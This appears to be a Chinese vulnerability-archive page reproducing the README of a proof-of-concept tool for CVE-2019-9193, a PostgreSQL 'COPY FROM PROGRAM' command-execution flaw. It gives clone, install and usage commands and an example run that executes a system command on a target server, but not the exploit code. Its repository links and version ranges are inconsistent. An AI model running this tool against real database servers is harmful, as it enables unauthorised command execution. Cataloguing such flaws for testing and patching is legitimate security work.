目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2019-9193 PoC — PostgreSQL 操作系统命令注入漏洞

来源
https://github.com/jhnhnck/CVE-2019-9193
关联漏洞
标题:PostgreSQL 操作系统命令注入漏洞 (CVE-2019-9193)
Description:PostgreSQL是PostgreSQL组织的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3至11.2版本中的导入导出数据命令‘COPY TO/FROM PROGRAM’存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令。
Description
PoC tool designed to exploit an authenticated Remote Code Execution (RCE) vulnerability in certain versions of PostgreSQL (9.3 - 11.7)
介绍
# EN
**GenPostgresRCEExploit** is a PoC tool designed to exploit an authenticated Remote Code Execution (RCE) vulnerability in certain versions of PostgreSQL (9.3 - 11.7). It allows authenticated users to execute system commands on a PostgreSQL database server vulnerable to CVE-2019-9193.

## Features
- **Exploitation of RCE**: Executes system commands through an authenticated PostgreSQL session.
- **Version Check**: Checks the version of the target PostgreSQL server to confirm the presence of a vulnerability.
- **Command Execution**: Allows user commands to be executed on the server if it is vulnerable.
- **Automatic Table Management**: Creates and deletes a temporary table to execute commands without manual intervention.

## Requirements
- Python 3.x
- PostgreSQL Python library (`psycopg2` from pip)
- PostgreSQL library headers (`libpq-dev` from apt)

## Installation
1. Clone the repository:
    ```bash
    git clone https://github.com/AxthonyV/CVE-2019-9193
    cd CVE-2019-9193
    ```
2. Install the required packages:
    ```bash
    pip install -r requirements.txt
    ```

## Usage
```bash
python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c "<system_command>"
```

### Options
- `-i`, `--ip`: IP address of the PostgreSQL server (Default: 127.0.0.1)
- `-p`, `--port`: PostgreSQL server port (Default: 5432)
- `-d`, `--database`: PostgreSQL database name (Default: template1)
- `-U`, `--user`: Username to connect to the PostgreSQL server (Default: postgres)
- `-P`, `--password`: Password to connect to PostgreSQL server (Default: postgres)
- `-c`, `---command`: System command to be executed on the server
- `-t`, `--timeout`: Connection timeout in seconds (Default: 10)

## Example
```bash
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
```
This example connects to the PostgreSQL server at `192.168.1.10`, authenticates with the provided credentials, and executes the `whoami` command.

## Example output
```
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Connection to PostgreSQL database at 192.168.1.10:5432
[+] Connection successfully established
[+] PostgreSQL version check
[+] Vulnerable PostgreSQL version detected: 10.4
[+] Temporary table creation: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Command successfully executed

postgres
```

## Disclaimer
This tool is intended for educational purposes and ethical testing only. Unauthorized use of this tool against any systems is illegal and strictly prohibited. The authors do not take responsibility for any misuse.

# RU
**GenPostgresRCEExploit** is a PoC exploit designed to exploit remote code execution (RCE) vulnerability in certain versions of PostgreSQL (9.3 - 11.7). The program allows authenticated users to execute system commands on a PostgreSQL server vulnerable to CVE-2019-9193.

## Features
- **Exploit RCE**: Execute system commands over an authenticated connection to PostgreSQL.
- **Version Check**: Checks the version of the target PostgreSQL server for vulnerabilities.
- **Command Execution**: Allows arbitrary commands to be executed on the server in the presence of a vulnerability.
- **Table Management**: Automatically creates and deletes a temporary table for command execution.

## Requirements
- Python 3.x
- PostgreSQL client library (`psycopg2` package)

## Installation
1. Clone the repository:
    ```bash
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    ```
2. Install the required packages:
    ```bash
    pip install -r requirements.txt
    ```

## Usage
```bash
python3 GenPostgresRCEExploit.py -i <IP address> -p <port> -d <database_name> -U <user> -P <password> -c "<system_command>"
```

### Options
- `-i`, `--ip`: IP address of PostgreSQL server (Default: 127.0.0.1)
- `-p`, `--port`: PostgreSQL server port (Default: 5432)
- `-d`, `--database`: PostgreSQL database name (Default: template1)
- `-U`, `--user`: Username to connect to the PostgreSQL server (Default: postgres)
- `-P`, `--password`: Password to connect to PostgreSQL server (Default: postgres)
- `-c`, `--command`: System command to execute on the server
- `-t`, `--timeout`: Connection timeout in seconds (Default: 10)

## Example
```bash
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
```
In this example, the program connects to the PostgreSQL server at `192.168.1.10`, authenticates with the specified credentials, and executes the `whoami` command.

## Example output
```
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Connection to PostgreSQL database at 192.168.1.10:5432
[+] Connection successfully established
[+] PostgreSQL version check
[+] Vulnerable PostgreSQL version detected: 10.4
[+] Temporary table creation: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Command successfully executed

postgres
```

## Disclaimer
This tool is for educational purposes and legal testing only. Unauthorized use of this tool against any systems is illegal and strictly prohibited. The authors are not responsible for any misuse.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →